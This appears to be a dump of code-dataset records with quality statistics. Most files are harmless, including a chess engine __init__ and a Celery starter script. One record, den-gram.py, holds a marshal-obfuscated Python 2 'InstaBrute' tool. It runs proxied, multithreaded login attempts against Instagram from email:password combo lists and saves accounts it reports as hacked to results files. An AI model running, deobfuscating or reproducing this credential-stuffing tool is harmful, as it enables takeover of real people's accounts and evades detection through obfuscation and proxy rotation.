| qsc_code_size_file_byte | 2,790 | 0 |
| qsc_code_num_lines | 99 | 0 |
| qsc_code_num_chars_line_max | 59 | 0 |
| qsc_code_num_chars_line_mean | 28.181818 | 0 |
| qsc_code_frac_chars_alphabet | 0.680715 | 0 |
| qsc_code_frac_chars_comments | 0 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0.632353 | 0 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0.116487 | 0 |
| qsc_code_frac_chars_long_word_length | 0 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0.205882 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0.117647 | 0 |
| qsc_codepython_cate_var_zero | false | 0 |
| qsc_codepython_frac_lines_pass | 0 | 0 |
| qsc_codepython_frac_lines_import | 0.029412 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0 | 0 |
| qsc_codepython_score_lines_no_logic | 0.147059 | 0 |
| qsc_codepython_frac_lines_print | 0 | 0 |
| effective | 0 | |
| hits | 8 | |
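The duplicated n-gram fractions account for most of the flagged signals in these rows. As an illustration only (the dataset's exact definition is not given here), one common way to compute such a statistic over word n-grams:

```python
from collections import Counter

def frac_chars_dupe_ngrams(content: str, n: int = 5) -> float:
    """Approximate fraction of word characters that sit inside duplicated word n-grams.

    Illustrative definition only; the stored qsc_code_frac_chars_dupe_*grams
    values may be computed differently (e.g. over character positions).
    """
    words = content.split()
    if len(words) < n:
        return 0.0
    ngrams = [tuple(words[i:i + n]) for i in range(len(words) - n + 1)]
    counts = Counter(ngrams)
    total_chars = sum(len(w) for w in words)
    # characters belonging to n-grams that occur more than once (overlaps can
    # double-count, hence the clamp to 1.0)
    dupe_chars = sum(sum(len(w) for w in gram) * c for gram, c in counts.items() if c > 1)
    return min(dupe_chars / max(total_chars, 1), 1.0)
```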
Record 4: ICT154/den-gram, den-gram.py

| Field | Value |
|---|---|
| hexsha | 6527a1acdaf9512533096f431a864adf4b7ac246 |
| size | 14,735 |
| ext | py |
| lang | Python |
| max_stars_repo_path, max_issues_repo_path, max_forks_repo_path | den-gram.py |
| max_stars_repo_name, max_issues_repo_name, max_forks_repo_name | ICT154/den-gram |
| max_stars_repo_head_hexsha, max_issues_repo_head_hexsha, max_forks_repo_head_hexsha | c3f03e87637bde3b5064b2fdf4a81c3e29885ea9 |
| max_stars_repo_licenses, max_issues_repo_licenses, max_forks_repo_licenses | ["Apache-2.0"] |
| max_stars_count | 3 |
| max_stars_repo_stars_event_min_datetime | 2020-07-17T07:06:48.000Z |
| max_stars_repo_stars_event_max_datetime | 2021-08-31T02:07:47.000Z |
| max_issues_count, issues event min/max datetimes | null |
| max_forks_count | 3 |
| max_forks_repo_forks_event_min_datetime | 2019-11-26T11:14:16.000Z |
| max_forks_repo_forks_event_max_datetime | 2020-04-29T06:43:44.000Z |

content:
#Compiled By xNot_Found
#Github : https://github.com/ICT154
import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s\xb8\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x02\x00l\x05\x00m\x06\x00Z\x06\x00\x01e\x07\x00e\x01\x00j\x08\x00\x83\x01\x00Z\t\x00d\x03\x00Z\n\x00d\x04\x00Z\x0b\x00d\x05\x00Z\x0c\x00d\x06\x00Z\r\x00d\x07\x00Z\x0e\x00d\x08\x00Z\x0f\x00d\t\x00Z\x10\x00d\n\x00Z\x11\x00d\x0b\x00e\x12\x00f\x01\x00d\x0c\x00\x84\x00\x00\x83\x00\x00YZ\x13\x00e\x13\x00\x83\x00\x00\x01d\x01\x00S(\r\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x07\x00\x00\x00randints\x05\x00\x00\x00\x1b[31ms\x05\x00\x00\x00\x1b[32ms\x05\x00\x00\x00\x1b[33ms\x05\x00\x00\x00\x1b[34ms\x05\x00\x00\x00\x1b[35ms\x05\x00\x00\x00\x1b[36ms\x05\x00\x00\x00\x1b[37ms\x05\x00\x00\x00\x1b[39mt\n\x00\x00\x00InstaBrutec\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00B\x00\x00\x00s>\x00\x00\x00e\x00\x00Z\x01\x00d\x00\x00\x84\x00\x00Z\x02\x00d\x01\x00\x84\x00\x00Z\x03\x00d\x02\x00\x84\x00\x00Z\x04\x00d\x03\x00\x84\x00\x00Z\x05\x00d\x04\x00\x84\x00\x00Z\x06\x00d\x05\x00\x84\x00\x00Z\x07\x00RS(\x06\x00\x00\x00c\x01\x00\x00\x00\x0c\x00\x00\x00\n\x00\x00\x00C\x00\x00\x00s\xda\x01\x00\x00|\x00\x00j\x00\x00\x83\x00\x00\x01|\x00\x00j\x01\x00\x83\x00\x00\x01y=\x00t\x02\x00d\x01\x00\x83\x01\x00}\x01\x00t\x02\x00d\x02\x00\x83\x01\x00}\x02\x00|\x00\x00j\x00\x00\x83\x00\x00\x01|\x00\x00j\x01\x00\x83\x00\x00\x01t\x03\x00j\x04\x00d\x03\x00\x83\x01\x00\x01Wn*\x00\x01\x01\x01|\x00\x00j\x00\x00\x83\x00\x00\x01|\x00\x00j\x01\x00\x83\x00\x00\x01d\x04\x00GHt\x05\x00j\x06\x00\x83\x00\x00\x01n\x01\x00Xt\x07\x00t\x08\x00|\x02\x00\x83\x01\x00j\t\x00\x83\x00\x00j\n\x00\x83\x00\x00\x83\x01\x00|\x00\x00_\x0b\x00t\x08\x00|\x01\x00d\x05\x00\x83\x02\x00\x8f\x19\x00}\x03\x00|\x03\x00j\t\x00\x83\x00\x00j\n\x00\x83\x00\x00}\x04\x00Wd\x00\x00QXg\x00\x00}\x05\x00d\x06\x00|\x00\x00_\x0c\x00x\xd6\x00|\x04\x00D]\xce\x00}\x06\x00|\x00\x00j\x0c\x00t\r\x00|\x00\x00j\x0b\x00\x83\x01\x00k\x05\x00r\t\x01d\x06\x00|\x00\x00_\x0c\x00n\x00\x00|\x00\x00j\x0e\x00|\x00\x00j\x0c\x00\x83\x01\x00}\x07\x00|\x00\x00j\x0c\x00d\x07\x00\x17|\x00\x00_\x0c\x00|\x06\x00j\x0f\x00d\x08\x00\x83\x01\x00d\x06\x00\x19}\x08\x00|\x06\x00j\x0f\x00d\x08\x00\x83\x01\x00d\x07\x00\x19}\t\x00yR\x00t\x10\x00j\x11\x00d\t\x00|\x00\x00j\x12\x00d\n\x00|\x08\x00|\t\x00t\x13\x00|\x07\x00\x83\x01\x00f\x03\x00\x83\x00\x02}\n\x00|\n\x00j\x14\x00\x83\x00\x00\x01|\x05\x00j\x15\x00|\n\x00\x83\x01\x00\x01t\x16\x00j\x17\x00d\x0b\x00\x83\x01\x00\x01Wq\xdf\x00\x01\x01\x01q\xdf\x00Xq\xdf\x00Wx\x18\x00|\x05\x00D]\x10\x00}\x0b\x00|\x0b\x00j\x18\x00\x83\x00\x00\x01q\xb8\x01Wt\x19\x00d\x0c\x00\x83\x01\x00\x01d\x00\x00S(\r\x00\x00\x00Ns\'\x00\x00\x00 [?] Masukan List Email : Password --> s*\x00\x00\x00 [?] Masukan List Proxy (harus fresh) --> s%\x00\x00\x00xdg-open https://youtu.be/gwdTLnFBuEws*\x00\x00\x00 [!] Error , Silahkan Hubungi Author [!] 
t\x01\x00\x00\x00ri\x00\x00\x00\x00i\x01\x00\x00\x00t\x01\x00\x00\x00:t\x06\x00\x00\x00targett\x04\x00\x00\x00argsg\x9a\x99\x99\x99\x99\x99\xb9?s*\x00\x00\x00 [+] Selesai , Tekan Enter Untuk Keluar...(\x1a\x00\x00\x00t\x03\x00\x00\x00clst\n\x00\x00\x00print_logot\t\x00\x00\x00raw_inputt\x02\x00\x00\x00ost\x06\x00\x00\x00systemt\x03\x00\x00\x00syst\x04\x00\x00\x00exitt\x04\x00\x00\x00listt\x04\x00\x00\x00opent\x04\x00\x00\x00readt\n\x00\x00\x00splitlinest\t\x00\x00\x00proxylistt\x08\x00\x00\x00Coutproxt\x03\x00\x00\x00lent\x0e\x00\x00\x00Generate_Proxyt\x05\x00\x00\x00splitt\t\x00\x00\x00threadingt\x06\x00\x00\x00Threadt\x02\x00\x00\x00Got\x03\x00\x00\x00strt\x05\x00\x00\x00startt\x06\x00\x00\x00appendt\x04\x00\x00\x00timet\x05\x00\x00\x00sleept\x04\x00\x00\x00joint\x05\x00\x00\x00input(\x0c\x00\x00\x00t\x04\x00\x00\x00selft\x05\x00\x00\x00Combot\x05\x00\x00\x00Proxyt\x01\x00\x00\x00xt\t\x00\x00\x00Combolistt\x06\x00\x00\x00threadt\x05\x00\x00\x00combot\x05\x00\x00\x00proxyt\x04\x00\x00\x00usert\x08\x00\x00\x00passwordt\x01\x00\x00\x00tt\x01\x00\x00\x00j(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>t\x08\x00\x00\x00__init__\x14\x00\x00\x00sH\x00\x00\x00\x00\x01\n\x01\n\x01\x03\x01\x0c\x01\x0c\x01\n\x01\n\x01\x11\x01\x03\x01\n\x01\n\x01\x05\x01\x0e\x02!\x01\x12\x01\x18\x01\x06\x01\t\x01\r\x01\x18\x01\x0c\x01\x12\x01\x10\x01\x13\x01\x13\x01\x03\x01\x18\x01\x12\x02\n\x01\r\x01\x11\x01\x03\x01\x08\x01\r\x01\x0e\x01c\x01\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s0\x00\x00\x00d\x01\x00}\x01\x00d\x02\x00}\x02\x00t\x00\x00j\x01\x00|\x01\x00|\x02\x00g\x02\x00t\x00\x00j\x02\x00d\x03\x00k\x02\x00\x19\x83\x01\x00\x01d\x00\x00S(\x04\x00\x00\x00Nt\x05\x00\x00\x00clearR\x06\x00\x00\x00t\x02\x00\x00\x00nt(\x03\x00\x00\x00R\t\x00\x00\x00R\n\x00\x00\x00t\x04\x00\x00\x00name(\x03\x00\x00\x00R \x00\x00\x00t\x05\x00\x00\x00linuxt\x07\x00\x00\x00windows(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>R\x06\x00\x00\x00;\x00\x00\x00s\x06\x00\x00\x00\x00\x01\x06\x01\x06\x01c\x02\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x0b\x00\x00\x00|\x00\x00j\x00\x00|\x01\x00\x19S(\x01\x00\x00\x00N(\x01\x00\x00\x00R\x11\x00\x00\x00(\x02\x00\x00\x00R \x00\x00\x00t\x03\x00\x00\x00num(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>R\x14\x00\x00\x00@\x00\x00\x00s\x02\x00\x00\x00\x00\x01c\x01\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x81\x00\x00\x00d\x01\x00}\x01\x00d\x02\x00d\x03\x00d\x04\x00d\x05\x00d\x06\x00d\x07\x00g\x06\x00}\x02\x00d\x08\x00}\x03\x00xV\x00t\x00\x00|\x03\x00j\x01\x00d\t\x00\x83\x01\x00\x83\x01\x00D]?\x00\\\x02\x00}\x04\x00}\x05\x00t\x02\x00j\x03\x00j\x04\x00d\n\x00t\x05\x00j\x06\x00|\x02\x00\x83\x01\x00|\x05\x00|\x01\x00f\x03\x00\x16\x83\x01\x00\x01t\x07\x00j\x08\x00d\x0b\x00\x83\x01\x00\x01q:\x00Wd\x00\x00S(\x0c\x00\x00\x00Ns\x04\x00\x00\x00\x1b[0mi$\x00\x00\x00i \x00\x00\x00i"\x00\x00\x00i#\x00\x00\x00i\x1f\x00\x00\x00i%\x00\x00\x00s?\x02\x00\x00\n \xe2\x95\xa6\xe2\x95\x90\xe2\x95\x97\xe2\x95\x94\xe2\x95\x90\xe2\x95\x97\xe2\x95\x94\xe2\x95\xa6\xe2\x95\x97\xe2\x95\x94\xe2\x95\x90\xe2\x95\x97\xe2\x95\x94\xe2\x95\x97\xe2\x95\x94 \n \xe2\x95\xa0\xe2\x95\xa6\xe2\x95\x9d\xe2\x95\xa0\xe2\x95\x90\xe2\x95\xa3 \xe2\x95\x91\xe2\x95\x91\xe2\x95\x91\xe2\x95\xa3 \xe2\x95\x91\xe2\x95\x91\xe2\x95\x91 \n \xe2\x95\xa9\xe2\x95\x9a\xe2\x95\x90\xe2\x95\xa9 \xe2\x95\xa9\xe2\x95\x90\xe2\x95\xa9\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x9d \n 
\xe2\x95\xa6\xe2\x94\x8c\xe2\x94\x90\xe2\x94\x8c\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90\xe2\x94\x8c\xe2\x94\xac\xe2\x94\x90\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90 \xe2\x95\xa6 \xe2\x95\xa6\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x8c\xe2\x94\x80\n \xe2\x95\x91\xe2\x94\x82\xe2\x94\x82\xe2\x94\x82\xe2\x94\x94\xe2\x94\x80\xe2\x94\x90 \xe2\x94\x82 \xe2\x94\x9c\xe2\x94\x80\xe2\x94\xa4 \xe2\x95\xa0\xe2\x95\x90\xe2\x95\xa3\xe2\x94\x9c\xe2\x94\x80\xe2\x94\xa4\xe2\x94\x82 \xe2\x94\x9c\xe2\x94\xb4\xe2\x94\x90\n \xe2\x95\xa9\xe2\x94\x98\xe2\x94\x94\xe2\x94\x98\xe2\x94\x94\xe2\x94\x80\xe2\x94\x98 \xe2\x94\xb4 \xe2\x94\xb4 \xe2\x94\xb4 \xe2\x95\xa9 \xe2\x95\xa9\xe2\x94\xb4 \xe2\x94\xb4\xe2\x94\x94\xe2\x94\x80\xe2\x94\x98\xe2\x94\xb4 \xe2\x94\xb4\n Fb: Raden Gozal MAMIHCREW.CF \n \n GREETS > \xe2\x95\x91 BHCT \xe2\x95\x91 IES \xe2\x95\x91 ICT \xe2\x95\x91 BCC \xe2\x95\x91 And You \xe2\x95\x91 \n s\x01\x00\x00\x00\ns\x0c\x00\x00\x00\x1b[1;%dm%s%s\ng\x9a\x99\x99\x99\x99\x99\xa9?(\t\x00\x00\x00t\t\x00\x00\x00enumerateR\x15\x00\x00\x00R\x0b\x00\x00\x00t\x06\x00\x00\x00stdoutt\x05\x00\x00\x00writet\x06\x00\x00\x00randomt\x06\x00\x00\x00choiceR\x1c\x00\x00\x00R\x1d\x00\x00\x00(\x06\x00\x00\x00R \x00\x00\x00R-\x00\x00\x00t\x06\x00\x00\x00colorsR#\x00\x00\x00t\x01\x00\x00\x00Nt\x04\x00\x00\x00line(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>R\x07\x00\x00\x00C\x00\x00\x00s\x0c\x00\x00\x00\x00\x01\x06\x01\x18\x0c\x06\x01"\x01&\x01c\x04\x00\x00\x00\x07\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xe6\x00\x00\x00i\r\x00d\x01\x00d\x02\x006d\x03\x00d\x04\x006d\x05\x00d\x06\x006d\x07\x00d\x08\x006d\t\x00d\n\x006d\x0b\x00d\x0c\x006d\r\x00d\x0e\x006d\x0f\x00d\x10\x006d\x11\x00d\x12\x006d\x13\x00d\x14\x006d\r\x00d\x15\x006d\r\x00d\x16\x006d\x17\x00d\x18\x006}\x04\x00i\x02\x00|\x01\x00d\x19\x006|\x02\x00d\x1a\x006}\x05\x00|\x03\x00j\x00\x00d\x1b\x00\x19|\x04\x00d\x0e\x00<d\x1c\x00j\x01\x00|\x03\x00j\x00\x00d\x1d\x00\x19|\x03\x00j\x00\x00d\x1b\x00\x19\x83\x02\x00|\x04\x00d\x16\x00<t\x02\x00d\x1e\x00t\x03\x00|\x05\x00d\x19\x00\x19\x83\x01\x00\x17t\x03\x00|\x05\x00d\x1a\x00\x19\x83\x01\x00\x17\x83\x01\x00}\x06\x00|\x06\x00|\x04\x00d\x15\x00<|\x04\x00|\x05\x00f\x02\x00S(\x1f\x00\x00\x00Ns\x11\x00\x00\x00www.instagram.comt\x04\x00\x00\x00HostsD\x00\x00\x00Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0s\n\x00\x00\x00User-Agents\x03\x00\x00\x00*/*t\x06\x00\x00\x00Accepts\x0e\x00\x00\x00en-US,en;q=0.5s\x0f\x00\x00\x00Accept-Languages\x11\x00\x00\x00gzip, deflate, brs\x0f\x00\x00\x00Accept-Encodings\x1a\x00\x00\x00https://www.instagram.com/t\x07\x00\x00\x00Referert\x00\x00\x00\x00s\x0b\x00\x00\x00X-CSRFTokent\x01\x00\x00\x001s\x10\x00\x00\x00X-Instagram-AJAXs!\x00\x00\x00application/x-www-form-urlencodeds\x0c\x00\x00\x00Content-Typet\x0e\x00\x00\x00XMLHttpRequests\x10\x00\x00\x00X-Requested-Withs\x0e\x00\x00\x00Content-Lengtht\x06\x00\x00\x00Cookies\n\x00\x00\x00keep-alivet\n\x00\x00\x00Connectiont\x08\x00\x00\x00usernameR)\x00\x00\x00t\t\x00\x00\x00csrftokens)\x00\x00\x00mid={}; csrftoken={}; ig_pr=1; ig_vw=1366t\x03\x00\x00\x00midi\x13\x00\x00\x00(\x04\x00\x00\x00t\x07\x00\x00\x00cookiest\x06\x00\x00\x00formatR\x19\x00\x00\x00R\x13\x00\x00\x00(\x07\x00\x00\x00R 
\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00t\x04\x00\x00\x00sesst\x07\x00\x00\x00headerst\x05\x00\x00\x00datast\x0b\x00\x00\x00lenthofData(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>t\x06\x00\x00\x00HeaderV\x00\x00\x00s*\x00\x00\x00\x00\x01\x03\x01\x07\x01\x07\x01\x07\x01\x07\x01\x07\x01\x07\x01\x07\x01\x07\x01\x07\x01\x07\x01\x07\x01\x07\x01\n\x02\x14\x01\x11\x01\x10\x01\x14\x01(\x01\n\x01c\x04\x00\x00\x00\x0b\x00\x00\x00\n\x00\x00\x00C\x00\x00\x00s+\x02\x00\x00y\xfc\x01i\x01\x00|\x03\x00d\x01\x006}\x04\x00t\x00\x00j\x01\x00d\x02\x00d\x03\x00|\x04\x00d\x04\x00d\x05\x00\x83\x01\x02}\x05\x00t\x00\x00j\x02\x00\x83\x00\x00}\x06\x00|\x00\x00j\x03\x00|\x01\x00t\x04\x00|\x02\x00\x83\x01\x00|\x05\x00\x83\x03\x00\\\x02\x00}\x07\x00}\x08\x00|\x06\x00j\x05\x00d\x06\x00d\x07\x00|\x07\x00d\x08\x00|\x08\x00d\x03\x00|\x04\x00d\x04\x00d\x05\x00\x83\x01\x04}\t\x00d\t\x00|\t\x00j\x06\x00k\x06\x00r\xe3\x00t\x07\x00d\n\x00\x17|\x03\x00\x17d\x0b\x00\x17|\x01\x00\x17d\x0c\x00\x17|\x02\x00\x17d\r\x00\x17GHt\x08\x00d\x0e\x00d\x0f\x00\x83\x02\x00\x8f \x00}\n\x00|\n\x00j\t\x00|\x01\x00d\x0c\x00\x17|\x02\x00\x17d\x10\x00\x17\x83\x01\x00\x01Wd\x00\x00QXn\x18\x01d\x11\x00|\t\x00j\x06\x00k\x06\x00rv\x01d\x12\x00|\x03\x00\x17d\x13\x00\x17GHy7\x00|\x00\x00j\n\x00d\x14\x00\x17|\x00\x00_\n\x00|\x00\x00j\x0b\x00|\x01\x00|\x02\x00t\x04\x00|\x00\x00j\x0c\x00|\x00\x00j\n\x00\x19\x83\x01\x00\x83\x03\x00\x01Wq\xfb\x01\x01\x01\x01|\x00\x00j\n\x00d\x15\x00\x18|\x00\x00_\n\x00|\x00\x00j\x0b\x00|\x01\x00|\x02\x00t\x04\x00|\x00\x00j\x0c\x00|\x00\x00j\n\x00\x19\x83\x01\x00\x83\x03\x00\x01q\xfb\x01Xn\x85\x00d\x16\x00|\t\x00j\x06\x00k\x06\x00r\xda\x01t\r\x00d\x17\x00\x17|\x03\x00\x17d\x0b\x00\x17|\x01\x00\x17d\x0c\x00\x17|\x02\x00\x17d\x18\x00\x17GHt\x08\x00d\x19\x00d\x0f\x00\x83\x02\x00\x8f \x00}\n\x00|\n\x00j\t\x00|\x01\x00d\x0c\x00\x17|\x02\x00\x17d\x10\x00\x17\x83\x01\x00\x01Wd\x00\x00QXn!\x00t\x0e\x00d\x17\x00\x17|\x03\x00\x17d\x0b\x00\x17|\x01\x00\x17d\x0c\x00\x17|\x02\x00\x17d\x1a\x00\x17GHWn(\x00\x01\x01\x01t\x0e\x00d\x17\x00\x17|\x03\x00\x17d\x0b\x00\x17|\x01\x00\x17d\x0c\x00\x17|\x02\x00\x17d\x1a\x00\x17GHn\x01\x00Xd\x00\x00S(\x1b\x00\x00\x00Nt\x04\x00\x00\x00https\x19\x00\x00\x00https://www.instagram.comt\x07\x00\x00\x00proxiest\x07\x00\x00\x00timeouti\n\x00\x00\x00s.\x00\x00\x00https://www.instagram.com/accounts/login/ajax/RI\x00\x00\x00t\x04\x00\x00\x00datas\x14\x00\x00\x00authenticated": trues\x1e\x00\x00\x00 [+] Sedang Di Hack \xe2\x95\x91RG\xe2\x95\x91 s\x08\x00\x00\x00 \xe2\x95\x91\xe2\x95\x91 R\x03\x00\x00\x00s\x1a\x00\x00\x00 \xe2\x95\x91\xe2\x95\x91 Berhasil Di Hack !s\x0b\x00\x00\x00results.txtt\x01\x00\x00\x00as\x01\x00\x00\x00\ns.\x00\x00\x00Please wait a few minutes before you try againt\x01\x00\x00\x00 s"\x00\x00\x00 Ip Anda Terbanned Segera Ganti...i\x01\x00\x00\x00i\x02\x00\x00\x00t\x13\x00\x00\x00checkpoint_requireds\x1d\x00\x00\x00 [+] Sedang Di Hack \xe2\x95\x91RG\xe2\x95\x91 s"\x00\x00\x00 \xe2\x95\x91\xe2\x95\x91 Berhasil Namu CheckPoint !s\x16\x00\x00\x00results_NeedVerfiy.txts\x0f\x00\x00\x00 \xe2\x95\x91\xe2\x95\x91 gagal !(\x0f\x00\x00\x00t\x08\x00\x00\x00requestst\x03\x00\x00\x00gett\x07\x00\x00\x00sessionRL\x00\x00\x00R\x19\x00\x00\x00t\x04\x00\x00\x00postt\x04\x00\x00\x00textt\x01\x00\x00\x00gR\x0e\x00\x00\x00R5\x00\x00\x00R\x12\x00\x00\x00R\x18\x00\x00\x00R\x11\x00\x00\x00t\x01\x00\x00\x00yt\x01\x00\x00\x00c(\x0b\x00\x00\x00R 
\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00t\x06\x00\x00\x00proxyzR\'\x00\x00\x00t\x07\x00\x00\x00HeddataRH\x00\x00\x00RI\x00\x00\x00RJ\x00\x00\x00t\x03\x00\x00\x00GoTR#\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>R\x18\x00\x00\x00n\x00\x00\x00s4\x00\x00\x00\x00\x01\x03\x01\r\x01\x1b\x01\x0c\x01!\x01\x18\x01\x0f\x01\x0f\x01!\x01\x12\x01"\x01\x0f\x01\r\x01\x03\x01\x10\x01\'\x01\x03\x01\x10\x01*\x01\x0f\x01!\x01\x12\x01"\x02%\x01\x03\x01(\x08\x00\x00\x00t\x08\x00\x00\x00__name__t\n\x00\x00\x00__module__R,\x00\x00\x00R\x06\x00\x00\x00R\x14\x00\x00\x00R\x07\x00\x00\x00RL\x00\x00\x00R\x18\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>R\x01\x00\x00\x00\x13\x00\x00\x00s\x0c\x00\x00\x00\x06\x01\t\'\t\x05\t\x03\t\x13\t\x18(\x14\x00\x00\x00RT\x00\x00\x00R\x0b\x00\x00\x00R\x16\x00\x00\x00R\x1c\x00\x00\x00R\t\x00\x00\x00R6\x00\x00\x00R\x00\x00\x00\x00R\x19\x00\x00\x00t\x07\x00\x00\x00versiont\x0c\x00\x00\x00CheckVersionR\x02\x00\x00\x00RY\x00\x00\x00RZ\x00\x00\x00t\x01\x00\x00\x00bt\x01\x00\x00\x00mR[\x00\x00\x00t\x01\x00\x00\x00wt\x02\x00\x00\x00rrt\x06\x00\x00\x00objectR\x01\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x18\x00\x00\x00H\x01\x10\x01\x0f\x02\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x05\x16x'))
| 2,947
| 14,659
| 0.746793
| 3,237
| 14,735
| 3.391103
| 0.116157
| 0.278218
| 0.127904
| 0.07871
| 0.499043
| 0.411861
| 0.30491
| 0.270292
| 0.224014
| 0.21545
| 0
| 0.3894
| 0.019138
| 14,735
| 4
| 14,660
| 3,683.75
| 0.370096
| 0.0038
| 0
| 0
| 0
| 2.5
| 0.443824
| 0.406554
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0.5
| 0
| 0.5
| 0.5
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
|
0
| 12
|
e8ff15ac6ff159d1488f4c4cfd848cfb2cc81dfe
| 79
|
py
|
Python
|
chess_engine/__init__.py
|
foo290/Ai-ChessEngine
|
2dd897dd356e8e63d52bc50d239752598b2d359b
|
[
"MIT"
] | null | null | null |
chess_engine/__init__.py
|
foo290/Ai-ChessEngine
|
2dd897dd356e8e63d52bc50d239752598b2d359b
|
[
"MIT"
] | null | null | null |
chess_engine/__init__.py
|
foo290/Ai-ChessEngine
|
2dd897dd356e8e63d52bc50d239752598b2d359b
|
[
"MIT"
] | null | null | null |
from chess_engine.engine import GameState
from chess_engine.moves import Move
| 19.75
| 41
| 0.860759
| 12
| 79
| 5.5
| 0.583333
| 0.272727
| 0.454545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.113924
| 79
| 3
| 42
| 26.333333
| 0.942857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
331a29104af17d147f666d6ef4db1df4ffcc7ff2
| 154
|
py
|
Python
|
tools/dashboard/dashboardserver/run_celery.py
|
zstars/weblabdeusto
|
09bd9d93d483671bca67ee5c70a9c412eb5d352f
|
[
"BSD-2-Clause"
] | 15
|
2015-03-12T12:15:41.000Z
|
2021-12-20T17:53:24.000Z
|
tools/dashboard/dashboardserver/run_celery.py
|
zstars/weblabdeusto
|
09bd9d93d483671bca67ee5c70a9c412eb5d352f
|
[
"BSD-2-Clause"
] | 44
|
2015-01-07T09:22:05.000Z
|
2017-01-31T22:44:21.000Z
|
tools/dashboard/dashboardserver/run_celery.py
|
zstars/weblabdeusto
|
09bd9d93d483671bca67ee5c70a9c412eb5d352f
|
[
"BSD-2-Clause"
] | 22
|
2015-01-13T13:55:48.000Z
|
2021-12-16T17:07:00.000Z
|
import sys
from checks import celery_app
from checks import archimedes
celery_app.config_from_object("config")
celery_app.worker_main(sys.argv + ["-B"])
| 22
| 41
| 0.805195
| 24
| 154
| 4.916667
| 0.541667
| 0.228814
| 0.271186
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097403
| 154
| 7
| 41
| 22
| 0.848921
| 0
| 0
| 0
| 0
| 0
| 0.051613
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
683a58066d4f8cd37fd34753fee5cc19dcb62f95
| 5,617
|
py
|
Python
|
scriptStarter.py
|
johannes-schuetze/ALTO-framework-sim
|
7a8d1df549188684ad3636434ccd6cf064e82c4f
|
[
"MIT"
] | null | null | null |
scriptStarter.py
|
johannes-schuetze/ALTO-framework-sim
|
7a8d1df549188684ad3636434ccd6cf064e82c4f
|
[
"MIT"
] | null | null | null |
scriptStarter.py
|
johannes-schuetze/ALTO-framework-sim
|
7a8d1df549188684ad3636434ccd6cf064e82c4f
|
[
"MIT"
] | null | null | null |
